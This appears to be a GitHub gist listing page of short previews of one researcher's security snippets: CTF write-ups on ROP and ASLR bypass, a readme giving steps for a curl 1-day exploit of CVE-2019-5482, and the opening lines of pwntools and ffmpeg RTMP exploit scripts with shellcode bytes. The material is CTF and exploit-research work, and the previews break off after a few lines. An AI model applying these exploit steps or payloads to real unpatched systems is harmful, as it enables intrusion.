Skip to content

Instantly share code, notes, and snippets.

View PaulCher's full-sized avatar
🎯
Focusing

Paul PaulCher

🎯
Focusing
20 followers · 0 following
View GitHub Profile
@PaulCher
PaulCher / faust-fluxmail-writeup.md
Created July 20, 2022 00:15

The service fluxmail is a binary service that works as a systemd socket, and thus, can be launched from a command line for testing. After the launch, the main process starts a child process and communicates with child via pipes. Parent process interprets commands from user, sends messages to the pipe, and then child process executes the commands and communicates the result back to parent, so parent would be able to print it. All required information is stored in a data folder, so it can be reused later.

Finding weird places of code

After reading the initial bits I realized:

  • The bug is probably logical. It would be very hard exploit an overflow bug in the PIE binary.
  • It is very strange that data processing is moved to a child process? Why? May be we could inject somehow in the protocol (didn't work out for me)

There are several files, which contain user information:

@PaulCher
PaulCher / _readme.md
Last active July 23, 2023 15:01
curl 1-day exploit
  1. Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
  2. Update ip addresses at the source files
  3. Launch srv.py on the server
  4. Upload sol.php via curl: curl http://$URL:$PORT/ -d '[email protected]'
@PaulCher
PaulCher / exploit_hq_day6.py
Created October 31, 2017 19:29
#!/usr/bin/env python
from pwn import *
context(os='linux', arch='amd64')
BINARY = './hq2017_task6_m116'
def generate_shellcode():
c1 = '\x6a\x68\x90\xbaAAAA'
@PaulCher
PaulCher / asis_ctf_writeup.md
Last active August 21, 2024 15:03

start

By using the so called universal gadget from __libc_csu_init we can read shellcode into the rwx memory segment and return into it.

start hard

By executing read function we can overwrite only last two bytes of read to find something useful and defeat ASLR. Fortunately there is one-gadget RCE located at 0xf0567 in this version of libc, right near the read function (0xf6670). We overflow only last two bytes to defeat ASLR, so that only around 16 attemps needed, because of 4 bit entropy of ASLR.

EDIT: checkout another great solution proposed by agadeint in the comment section below, which is cleaner and does not require bruteforcing and one gadget.

@PaulCher
PaulCher / ffmpeg_rtmp_exploit.py
Created November 16, 2016 12:41
#!/usr/bin/python
import os
import socket
import struct
from time import sleep
from pwn import *
bind_ip = '0.0.0.0'
@PaulCher
PaulCher / exploit_ffmpeg.py
Last active May 4, 2023 18:46
#!/usr/bin/python
import re
import os
import sys
import socket
import threading
from time import sleep
from pwn import *
@PaulCher
PaulCher / .vimrc
Created April 20, 2016 14:04
" Line numeration
set noeb
set nu
" Use Vim settings, rather then Vi settings (much better!).
set nocompatible
" Turn on the verboseness to see everything vim is doing.
"set verbose=9